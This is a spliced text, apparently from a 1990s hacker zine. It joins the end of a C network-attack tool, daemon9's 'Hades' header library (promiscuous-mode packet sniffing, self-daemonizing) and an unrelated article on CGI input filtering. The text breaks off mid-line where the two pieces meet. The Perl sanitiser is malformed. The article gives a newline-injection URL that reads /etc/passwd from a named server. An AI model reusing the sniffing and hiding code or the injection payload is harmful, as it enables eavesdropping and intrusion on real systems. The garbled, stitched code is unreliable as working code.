* Dumps some info...
*/
void dump(iphp,tcphp)
struct iphdr *iphp;
struct tcphdr *tcphp;
{
fprintf(stdout,"Hmm... I smell an ACK: ");
fprintf(stdout,"%s [%d] --> %s [%d]\n",hostLookup(iphp->saddr),ntohs(tcphp->source),hostLookup(iphp->daddr),ntohs(tcphp->dest));
fprintf(stdout,"let's slow things down a bit\n");
}
-------------------------------8<-------cut-me-loose--------------------------
/*
Basic Linux Networking Header Information. v1.0
c. daemon9, Guild Corporation 1996
Includes:
tap
in_cksum
nameResolve
hostLookup
shadow
reaper
This is beta. Expect it to expand greatly the next time around ...
Sources from all over the map.
code from:
route
halflife
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DEVICE "eth0"
#define BUFSIZE 256
#define ETHHDR 14
#define TCPHDR 20
#define IPHDR 20
#define ICMPHDR 8
/*
* IP address into network byte order
*/
unsigned nameResolve(char *hostname){
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname))==-1){
if(!(hostEnt=gethostbyname(hostname))){
fprintf(stderr,"Name lookup failure: `%s`\n",hostname);
exit(0);
}
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
/*
* IP Family checksum routine
*/
unsigned short in_cksum(unsigned short *ptr,int nbytes){
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
/*
* Creates a low level raw-packet socket and puts the device into promiscuous mode.
*/
int tap(device)
char *device;
{
int fd; /* File descriptor */
struct ifreq ifr; /* Link-layer interface request structure */
/* Ethernet code for IP 0x800==ETH_P_IP */
if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){ /* Linux's way of */
perror("SOCK_PACKET allocation problems"); /* getting link-layer */
exit(1); /* packets */
}
strcpy(ifr.ifr_name,device);
if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){ /* Get the device info */
perror("Can't get device flags");
close(fd);
exit(1);
}
ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */
if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){ /* Set flags */
perror("Can't set promiscuous mode");
close(fd);
exit(1);
}
return(fd);
}
/*
* Network byte order into IP address
*/
char *hostLookup(in)
unsigned long in;
{
char hostname[BUFSIZE];
struct in_addr addr;
struct hostent *hostEnt;
bzero(&hostname,sizeof(hostname));
addr.s_addr=in;
hostEnt=gethostbyaddr((char *)&addr, sizeof(struct in_addr),AF_INET);
if(!hostEnt)strcpy(hostname,inet_ntoa(addr));
else strcpy(hostname,hostEnt->h_name);
return(strdup(hostname));
}
/*
* Simple daemonizing procedure.
*/
void shadow(void){
int fd,fs;
extern int errno;
char werd[]={"\n\n\n\nHades is a Guild Corporation Production. c.1996\n\n"};
signal(SIGTTOU,SIG_IGN); /* Ignore these signals */
signal(SIGTTIN,SIG_IGN);
signal(SIGTSTP,SIG_IGN);
printf(werd);
switch(fork()){
case 0: /* Child */
break;
default:
exit(0); /* Parent */
case -1:
fprintf(stderr,"Forking Error\n");
exit(1);
}
setpgrp();
if((fd=open("/dev/tty",O_RDWR))>=0){
ioctl(fd,TIOCNOTTY,(char *)NULL);
close(fd);
}
/*for(fd=0;fd', the delimiters for
HTML tags, are usually removed using a simple search and replace operation,
such as the following:
----------------8<----------------------------------------------------------
# Process input values
{$NAME, $VALUE) = split(/=/, $_); # split up each variable=value pair
$VALUE =~ s/\+/ /g; # Replace '+' with ' '
$VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg; # Replace %xx characters with ASCII
# Escape metacharacters
$VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters
$MYDATA[$NAME} = $VALUE; # Assign the value to the associative array
----------------8<----------------------------------------------------------
This example removes special characters such as the semi-colon
character, which is interpreted by the shell as a command separator.
Inclusion of a semi-colon in the input data allows for the possibility
of appending an additional command to the input. Take note of the forward
slash characters that precede the characters being substituted. In PERL, a
backslash is required to tell the interpreter not to process the following
character.*
The above example is incomplete since it does not address the
possibility of the new line character '%0a', which can be used to execute
commands other than those provided by the script. Therefore it is possible to
append a string to a URL to perform functions outside of the script. For
example, the following URL requests a copy of /etc/passwd from the server
machine:
http://www.odci.gov/cgi-bin/query?%0a/bin/cat%20/etc/passwd
The strings '%0a" and '%20' are ASCII line feed and blank respectively.
The front end interface to a CGI program is an HTML document called a
form. Forms include the HTML tag . Each tag has a variable
name associated with it. This is the variable name that forms the left hand
side of the previously mentioned variable=value token. The contents of the
variable forms the value portion of the token. Actual CGI scripts may
perform input filtering on the contents of the field. However if the
CGI script does not filter special characters, then a situation analogous to
the above example exists. Interpreted CGI scripts that fail to validate the
data will pass the data directly to the interpreter. **
Another HTML tag sometime seen in forms is the